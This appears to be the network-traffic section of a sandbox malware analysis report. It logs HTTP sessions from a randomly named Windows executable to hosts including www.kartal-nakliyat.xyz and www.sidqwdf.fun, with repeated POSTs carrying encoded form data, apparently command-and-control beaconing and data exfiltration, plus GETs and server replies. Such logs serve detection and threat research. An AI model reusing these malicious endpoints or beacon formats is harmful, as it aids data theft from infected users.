                                Oct 2, 2024 02:06:11.499744892 CEST398INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Wed, 02 Oct 2024 00:06:11 GMT
                                Content-Type: text/html
                                Content-Length: 258
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 6c 46 6c 3d 41 68 6f 48 62 56 56 38 77 38 46 68 6f 76 26 2d 4c 3d 61 63 78 72 53 6b 41 65 46 41 6e 2b 63 37 33 75 30 39 49 52 42 61 34 49 41 51 69 35 41 31 7a 37 5a 49 36 64 77 44 42 33 31 4c 4b 48 44 6b 39 55 39 61 43 47 46 35 78 67 57 2f 64 55 58 54 45 5a 35 48 74 4b 39 5a 51 59 59 65 4b 57 4a 35 4f 30 30 61 72 77 76 4c 56 6a 73 51 2f 49 41 50 4e 77 57 6d 36 61 6d 31 78 76 43 4a 4e 2b 54 69 68 4d 55 5a 58 72 6b 7a 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI="}</script></head></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.45682585.159.66.93804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:26.657737970 CEST779OUTPOST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 58 78 4b 66 4e 68 69 6b 35 6e 78 2b 2b 5a 67 49 52 53 78 43 53 64 69 4f 52 38 32 56 76 6d 47 48 76 65 4f 33 70 42 54 37 52 58 63 2b 63 39 76 54 69 6f 4f 45 78 70 2f 55 6d 4c 69 4b 71 35 71 69 64 56 46 56 45 67 64 62 34 4c 51 74 4c 44 6b 6d 37 4b 50 46 55 71 32 62 31 37 45 4d 62 67 79 6b 77 35 38 42 74 4b 2f 33 49 51 32 75 54 50 31 52 56 7a 38 2b 47 63 44 6e 48 54 6c 4a 73 32 71 64 41 31 62 4f 6a 77 75 57 39 4c 69 46 33 47 50 6b 32 4a 6b 67 72 59 2f 6a 59 5a 64 68 35 6f 75 2b 6d 61 45 61 55 4e 71 4d 41 78 79 4c 6b 67 43 64 7a 51 4f 6b 72 51 3d 3d
                                Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.45682685.159.66.93804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:29.197730064 CEST799OUTPOST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 4e 52 61 66 50 47 2b 6b 2b 48 78 39 79 35 67 49 62 79 78 47 53 64 2b 4f 52 35 62 59 76 56 69 48 75 37 79 33 71 46 48 37 53 58 63 2b 55 64 76 57 73 49 4f 66 78 70 7a 79 6d 4f 69 4b 71 34 4b 69 64 51 68 56 46 58 78 45 71 72 51 7a 65 54 6b 6b 34 36 50 46 55 71 32 62 31 37 52 62 62 68 61 6b 77 4a 4d 42 73 76 54 77 57 41 32 74 55 50 31 52 44 44 39 33 47 63 44 46 48 53 34 53 73 30 53 64 41 78 66 4f 74 42 75 56 32 4c 69 44 71 32 4f 70 33 64 39 79 75 37 57 67 53 59 59 41 6e 36 65 78 71 38 56 41 46 38 4c 62 53 78 57 34 35 6e 4c 70 2b 54 7a 74 77 53 68 61 77 52 67 59 61 62 67 4e 75 6a 78 36 63 36 7a 4f 53 51 63 3d
                                Data Ascii: -L=VpseEu0Le7StNRafPG+k+Hx9y5gIbyxGSd+OR5bYvViHu7y3qFH7SXc+UdvWsIOfxpzymOiKq4KidQhVFXxEqrQzeTkk46PFUq2b17RbbhakwJMBsvTwWA2tUP1RDD93GcDFHS4Ss0SdAxfOtBuV2LiDq2Op3d9yu7WgSYYAn6exq8VAF8LbSxW45nLp+TztwShawRgYabgNujx6c6zOSQc=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.45682785.159.66.93804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:31.745949984 CEST10881OUTPOST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 4e 52 61 66 50 47 2b 6b 2b 48 78 39 79 35 67 49 62 79 78 47 53 64 2b 4f 52 35 62 59 76 56 71 48 75 4e 6d 33 71 6b 48 37 54 58 63 2b 65 39 76 58 73 49 50 46 78 71 44 2b 6d 4f 6d 77 71 38 36 69 63 79 70 56 4e 44 6c 45 7a 62 51 7a 47 6a 6b 6e 37 4b 50 55 55 71 6d 45 31 37 42 62 62 68 61 6b 77 4c 55 42 6f 36 2f 77 55 41 32 75 54 50 31 56 56 7a 39 62 47 63 62 2f 48 53 74 6e 35 51 75 64 4f 31 37 4f 76 7a 47 56 71 62 69 37 36 6d 50 36 33 59 6b 73 75 37 4b 4b 53 59 74 56 6e 35 43 78 37 4e 51 2b 5a 75 37 41 45 68 4b 56 76 45 7a 4a 2b 30 4c 52 7a 51 56 41 67 30 73 7a 59 35 67 35 72 53 6b 76 4f 72 62 34 51 30 77 65 48 4d 37 45 4e 35 51 4a 75 32 4f 47 61 4a 77 30 61 39 6c 62 57 35 34 31 47 45 78 35 33 46 58 78 43 68 36 41 35 5a 33 64 65 4f 2b 6b 67 63 32 65 52 49 6f 62 57 53 73 46 62 68 49 67 58 47 48 2f 59 37 31 68 42 33 4f 44 70 35 51 57 47 71 30 47 79 44 30 4f 58 50 68 51 41 50 33 31 79 46 65 72 6b 4f 6c 2b 53 50 46 47 6e 4a 37 74 72 41 4f 55 6e 78 43 70 68 79 50 [TRUNCATED]
                                Data Ascii: -L=VpseEu0Le7StNRafPG+k+Hx9y5gIbyxGSd+OR5bYvVqHuNm3qkH7TXc+e9vXsIPFxqD+mOmwq86icypVNDlEzbQzGjkn7KPUUqmE17BbbhakwLUBo6/wUA2uTP1VVz9bGcb/HStn5QudO17OvzGVqbi76mP63Yksu7KKSYtVn5Cx7NQ+Zu7AEhKVvEzJ+0LRzQVAg0szY5g5rSkvOrb4Q0weHM7EN5QJu2OGaJw0a9lbW541GEx53FXxCh6A5Z3deO+kgc2eRIobWSsFbhIgXGH/Y71hB3ODp5QWGq0GyD0OXPhQAP31yFerkOl+SPFGnJ7trAOUnxCphyP7E8Dvghogd9YwA/nZolhiIA4pTxW1Bgx/GXLAUmEMXaPUp1VqpVazopI1RrWz+MDp+YIOgePQEWxrMSL0GkjT18vgIMBq2mHrNuiuAiVD4KaX4zf1E59B7p76NZqQ9pbE6n8yOnmgNu42U/8GiSMmBVuDduhtD3djbd6KcGRFblVPEey4etdKROx0B58w5sVVEfX4oDF8NGngjcXxQl9G6XkZ1iLtsaT5RzWqfE2i8FPuMulfbWGDSpFV1738j8zH3Xw4P2CDnUblMQtnRRnw1Al1KthFUxWMpXszSRnWlueGx5G92Hyp2B9AJMDcBUKUL3xVyE1/udvnrq3/EJTBitU0pc4K4RFpYZt9w45OPPZwjk4EQFuzILnRYzPU4vNN+jDm3rzLF4Z+GUc7H6N3ghmhAjagdTyEGAYWuKh1X4FTn41NqiHv4n+UeTUUe894YNU353Z6/oZrAmtgFrvwYgvdLCd57+s7jYsB9IhpqjBvN/vP2T21TttSQTyZwhj8qfb5cw9Sfp3/9e83snTxKXFsytySgoIoyVT7+FYc6ozwA8Oi8jW8JooyTdwQ1vI8Vh5oZLdUPM/fxBejQ8pvBybnU1sNdDT1NF3cCkiyXMkNpmrhTRpBjECQEO4MEbyBwji0zLrJoN3jWoWYcZkudicg1PCKxliFs [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.45682885.159.66.93804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:34.288280964 CEST504OUTGET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.kartal-nakliyat.xyz
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:06:34.961744070 CEST225INHTTP/1.1 404 Not Found
                                Server: nginx/1.14.1
                                Date: Wed, 02 Oct 2024 00:06:34 GMT
                                Content-Length: 0
                                Connection: close
                                X-Rate-Limit-Limit: 5s
                                X-Rate-Limit-Remaining: 19
                                X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.456829185.106.176.204804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:41.159516096 CEST755OUTPOST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 33 32 52 46 75 50 62 6e 32 36 46 54 39 6f 39 74 6e 34 47 32 62 6b 6c 5a 55 31 47 6c 45 36 62 70 70 38 45 77 30 4d 45 68 69 39 69 30 75 78 45 37 32 79 52 76 51 75 4c 76 6e 6e 47 34 38 59 31 4d 6e 66 39 66 46 55 2f 53 33 68 45 37 77 6b 77 42 61 55 57 46 69 37 48 59 33 4a 45 5a 6c 69 6a 34 74 70 6e 76 76 46 4e 47 6a 30 31 6c 52 4a 71 6b 76 32 31 41 68 4a 6f 34 76 64 6c 6a 58 72 2b 5a 67 65 77 45 44 59 31 34 4b 36 45 34 39 53 69 72 69 49 33 4f 58 32 2f 6b 54 59 75 74 77 68 6e 44 78 38 65 4f 33 52 4f 5a 6a 53 6c 42 65 70 6b 51 74 6a 42 55 79 63 32 73 6b 2b 42 6f 42 4e 44 4e 4b 41 3d 3d
                                Data Ascii: -L=32RFuPbn26FT9o9tn4G2bklZU1GlE6bpp8Ew0MEhi9i0uxE72yRvQuLvnnG48Y1Mnf9fFU/S3hE7wkwBaUWFi7HY3JEZlij4tpnvvFNGj01lRJqkv21AhJo4vdljXr+ZgewEDY14K6E49SiriI3OX2/kTYutwhnDx8eO3ROZjSlBepkQtjBUyc2sk+BoBNDNKA==
                                Oct 2, 2024 02:06:41.993045092 CEST720INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:41 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.456830185.106.176.204804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:43.697858095 CEST775OUTPOST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 33 32 52 46 75 50 62 6e 32 36 46 54 39 49 4e 74 30 4b 75 32 63 45 6c 61 58 31 47 6c 4b 71 62 74 70 38 49 77 30 4e 77 78 6a 49 4b 30 76 51 30 37 33 7a 52 76 64 4f 4c 76 2f 58 47 35 34 59 31 48 6e 66 78 74 46 55 44 53 33 68 51 37 77 67 38 42 61 6e 4f 47 6a 72 48 61 2b 70 45 62 36 79 6a 34 74 70 6e 76 76 46 6f 68 6a 30 64 6c 53 34 61 6b 67 33 31 48 72 70 6f 37 71 74 6c 6a 45 37 2b 64 67 65 78 54 44 5a 59 76 4b 34 73 34 39 54 53 72 69 5a 33 4e 4d 47 2f 39 63 34 76 34 38 30 37 4b 70 65 57 4f 2b 6a 75 67 74 41 64 66 57 50 31 4b 38 53 67 44 67 63 53 66 35 35 49 63 4d 4f 2b 45 52 4c 4d 56 71 47 37 4e 41 50 4d 75 59 4f 65 48 79 5a 42 4c 6f 50 4d 3d
                                Data Ascii: -L=32RFuPbn26FT9INt0Ku2cElaX1GlKqbtp8Iw0NwxjIK0vQ073zRvdOLv/XG54Y1HnfxtFUDS3hQ7wg8BanOGjrHa+pEb6yj4tpnvvFohj0dlS4akg31Hrpo7qtljE7+dgexTDZYvK4s49TSriZ3NMG/9c4v4807KpeWO+jugtAdfWP1K8SgDgcSf55IcMO+ERLMVqG7NAPMuYOeHyZBLoPM=
                                Oct 2, 2024 02:06:44.549160957 CEST720INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.456831185.106.176.204804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:46.249010086 CEST10857OUTPOST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 33 32 52 46 75 50 62 6e 32 36 46 54 39 49 4e 74 30 4b 75 32 63 45 6c 61 58 31 47 6c 4b 71 62 74 70 38 49 77 30 4e 77 78 6a 49 53 30 76 6d 67 37 31 51 4a 76 63 4f 4c 76 68 6e 47 6b 34 59 31 65 6e 62 64 70 46 55 4f 6e 33 6a 6f 37 78 44 30 42 59 57 4f 47 6f 72 48 61 68 35 45 61 6c 69 6a 74 74 74 44 72 76 46 34 68 6a 30 64 6c 53 36 43 6b 6e 6d 31 48 34 35 6f 34 76 64 6c 6e 58 72 2b 31 67 61 64 44 44 5a 73 2f 4b 49 4d 34 39 7a 43 72 6c 72 66 4e 52 32 2f 2f 62 34 75 37 38 30 2b 53 70 65 4c 31 2b 6e 6d 47 74 44 42 66 53 72 59 39 76 78 63 38 39 50 4b 36 73 70 49 71 58 73 33 47 61 61 4d 66 68 58 62 2f 62 75 77 32 55 4f 37 77 70 4c 39 55 35 4c 34 4c 71 32 4e 4f 30 4d 47 58 4b 6d 48 43 37 67 73 72 78 39 63 63 32 44 7a 47 5a 69 73 39 48 66 4b 79 4c 46 4f 58 4d 32 31 56 35 68 45 62 34 65 62 79 4d 4b 54 46 4b 39 6d 4a 6b 43 76 6f 5a 76 36 6e 33 6a 51 36 47 44 36 35 64 63 79 32 30 70 49 67 31 4c 4d 74 54 51 4f 54 5a 44 53 78 50 38 2b 47 41 33 67 43 59 35 46 73 68 64 55 67 54 7a 56 4b 4a 68 46 38 59 76 4c [TRUNCATED]
                                Data Ascii: -L=32RFuPbn26FT9INt0Ku2cElaX1GlKqbtp8Iw0NwxjIS0vmg71QJvcOLvhnGk4Y1enbdpFUOn3jo7xD0BYWOGorHah5EalijtttDrvF4hj0dlS6Cknm1H45o4vdlnXr+1gadDDZs/KIM49zCrlrfNR2//b4u780+SpeL1+nmGtDBfSrY9vxc89PK6spIqXs3GaaMfhXb/buw2UO7wpL9U5L4Lq2NO0MGXKmHC7gsrx9cc2DzGZis9HfKyLFOXM21V5hEb4ebyMKTFK9mJkCvoZv6n3jQ6GD65dcy20pIg1LMtTQOTZDSxP8+GA3gCY5FshdUgTzVKJhF8YvL6ql30pgBf/+s4Is6aF3tH33PRVcdk7tU2lnTnBgcs5c6wVZ0XwtrS8TQpATDq25fR8XmjMv5UQ1WRmWeTq9uNIidVNSJluyWg6JkEIN3BWF3/9RBolizTiLXLqh0PmfVQQf+bpBpjzi1P0BE7OJgHRqBs6TujEsuUlIi+78iGPVx6Epp7DYOzxiiDvf0wwfpgAcDPeaQCfxE+NP/ueCMnT7vLHkiVFtdeJ+f8qu0N25266ye4ChKsOpK8bbGWY1FJ3EU7p20YycRA5e0o6n5eMd81k4GBj1YTFltzSt0xbMPy5OwAhTh202yghoJHVk2eJim19En7webxx4oqgcuoeKOnzEmnlYYP14v9O1LTF56cWHpJM10fqZYqo0bxjZcmJdlKlx57TLR8qUA3MsjIjcXWc0X6yn4sy6VK3Yj6HZGQTF1chu4G+54snJqf0mtnuo9rDief0mgcDFPDKdMSrK4wedmep3L7pq8JARU4Qmtifk0CtZNPImnqUXFOa/BulXb0oOayW1O3V8Qm5kKnKRanZRIPBNRSQZVbHS2pL/BIBaftkn05ZUJdvlMHizTR4jkkU2ZYSjNOmR3TwF+bZr7ZOvhZQtqAJy1A6vVgO2gBUPdZnJ3YZKx4qxnS4f/1LAqkzcxUztikkzKigHa9lRVF61cJDVGG0 [TRUNCATED]
                                Oct 2, 2024 02:06:47.083098888 CEST720INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:46 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.456832185.106.176.204804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:48.795732975 CEST496OUTGET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.sidqwdf.fun
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
